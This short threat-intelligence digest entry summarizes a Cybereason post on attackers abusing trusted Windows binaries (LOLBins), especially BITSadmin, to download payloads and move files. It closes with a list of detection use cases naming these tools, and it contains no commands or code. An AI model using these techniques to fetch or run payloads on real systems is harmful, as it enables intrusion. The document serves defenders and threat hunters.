March 15, 2022

Cybereason LOLBins & BITSadmin

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason’s threat hunting post dives into the usage of Living Off the Land Binaries (LOLBins) and deep dive with the tool BITSadmin. Many malware and ransomware variants abuse trust binaries for threat activities. Notable LOLBins utilized include msiexec, wscript, installutil, rundll32, regsvr32, wmic, certutil and bitsadmin. A variety of other applicable LOLBins exist that can be reviewed from the LOLbas project on Github, with many detections also available in the Anvilogic Armory. Analysis of BITSAdmin identified the tool has many applicable uses to “create, download, or upload jobs and monitor their progress” as detailed in Microsoft’s documentation. Attackers have leveraged BITSadmin’s capabilities to maliciously download payloads and/or to copy and move files. Various malware such as Astaroth malware, Egregor ransomware and ramnit trojan has utilized BITSadmin.

  • Anvilogic Scenario: Astaroth – Attack Chain with LOLBins
  • Anvilogic Use Cases:
    • BITSadmin Execution
    • Msiexec Abuse
    • Wscript/Cscript Execution
    • regsvr32 Execution
    • Rundll32 Command Line
    • Suspicious process Spawned by Java
    • Certutil File Download